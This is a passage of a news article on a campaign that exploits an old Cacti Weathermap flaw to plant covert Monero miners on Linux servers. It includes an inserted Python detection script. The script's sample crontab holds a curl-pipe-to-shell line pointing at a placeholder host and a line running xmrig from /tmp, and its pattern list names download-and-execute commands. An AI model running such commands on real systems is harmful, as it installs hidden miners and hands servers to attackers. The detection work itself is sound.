Hackers are using a five-year-old security vulnerability to infect Linux servers with cryptocurrency-mining malware.
The cryptojacking campaign exploits CVE-2013-2618, an old vulnerability in Cacti's Network Weathermap plug-in, an open source tool which is used by network administrators to visualise network activity.
Uncovered by researchers at Trend Micro, the campaign is still active and is targeting publicly accessible x86-64 Linux web servers around the world, with the highest proportion of targets in Japan, Taiwan, China, and the US.
The attackers use the exploit to request to view the code on the server, and the flaw lets them alter that code so that a coin miner is installed on the system.
The process runs every three minutes, so that if the miner is somehow shut down, the server will soon restart it.
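As an added, defender-side illustration (not code from the article or from Trend Micro's research): the three-minute restart loop described above is the kind of persistence a host-level check can catch. The script below assumes that loop is implemented as a cron entry (the article does not say how the timer is realised), parses crontab text, works out how often each entry fires from its minute field, and flags entries that combine a short interval with traits commonly seen in miner persistence. The sample crontab, the placeholder URL and the heuristic pattern list are constructed for this example.

```python
"""Flag crontab entries that fire at short intervals and look like miner persistence.

Added example; the crontab text, URL placeholder and patterns are constructed,
and the assumption that the restart loop is a cron entry is ours, not the article's.
"""
import re
from typing import Dict, List, Set

# Heuristic traits (assumption: our own list, not derived from the article).
SUSPICIOUS_PATTERNS = {
    "download-and-execute": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|da)?sh\b"),
    "runs from scratch dir": re.compile(r"(^|\s)/(tmp|var/tmp|dev/shm)/"),
    "miner binary name": re.compile(r"xmrig", re.IGNORECASE),
}

# Constructed sample: two benign entries, one short-interval health check,
# and two entries modelled on a three-minute miner restart loop.
SAMPLE_CRONTAB = """\
# constructed sample crontab
MAILTO=""
0 2 * * * /usr/bin/apt-get update >/dev/null 2>&1
*/5 * * * * /usr/local/bin/healthcheck.sh
*/3 * * * * curl -fsSL http://EXAMPLE-PLACEHOLDER.invalid/m.sh | sh >/dev/null 2>&1
*/3 * * * * /tmp/.x/xmrig >/dev/null 2>&1
"""


def expand_minute_field(field: str) -> Set[int]:
    """Expand a cron minute field ("*", "*/3", "0,30", "1-5") into the minutes it covers."""
    minutes: Set[int] = set()
    for part in field.split(","):
        step = 1
        if "/" in part:
            part, step_text = part.split("/", 1)
            step = int(step_text)
        if part == "*":
            lo, hi = 0, 59
        elif "-" in part:
            lo, hi = (int(x) for x in part.split("-", 1))
        else:
            lo = hi = int(part)
        minutes.update(range(lo, hi + 1, step))
    return minutes


def min_interval_minutes(minute_field: str) -> int:
    """Shortest gap between two firings implied by the minute field alone (60 if once per hour)."""
    mins = sorted(expand_minute_field(minute_field))
    if len(mins) <= 1:
        return 60
    gaps = [b - a for a, b in zip(mins, mins[1:])]
    gaps.append(60 - mins[-1] + mins[0])  # wrap-around gap across the hour boundary
    return min(gaps)


def parse_crontab(text: str) -> List[Dict[str, str]]:
    """Split crontab text into schedule/command pairs, skipping comments and variable lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue
        entries.append({"schedule": " ".join(fields[:5]), "command": fields[5]})
    return entries


def assess_crontab(text: str, short_interval_minutes: int = 5) -> List[Dict]:
    """Return findings for entries that fire often and/or match a suspicious trait.

    Severity: high = short interval plus a trait match, medium = trait match only,
    low = short interval only (worth a look, but often a legitimate health check).
    """
    findings = []
    for entry in parse_crontab(text):
        interval = min_interval_minutes(entry["schedule"].split()[0])
        reasons = []
        if interval <= short_interval_minutes:
            reasons.append(f"fires every {interval} min")
        hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(entry["command"])]
        reasons.extend(hits)
        if not reasons:
            continue
        if hits and interval <= short_interval_minutes:
            severity = "high"
        elif hits:
            severity = "medium"
        else:
            severity = "low"
        findings.append({**entry, "interval_minutes": interval, "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in assess_crontab(SAMPLE_CRONTAB):
        print(f"[{f['severity']:6}] {f['schedule']}  {f['command']}  <- {', '.join(f['reasons'])}")
```

On a real host the same function can be fed the output of `crontab -l` for each user and the contents of `/etc/cron.d`; the low-severity bucket exists precisely so that a legitimate five-minute health check is surfaced for review rather than mixed in with the high-confidence hits.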
The miner itself is a modified XMRig tool, a legitimate, open-source Monero miner, configured to mine covertly for the attackers' benefit. Those behind it can even alter the maximum CPU usage of the miner, should they wish to lower the share of processing power used in order to reduce the chances of their activity being noticed.
Researchers uncovered some of the wallets, and say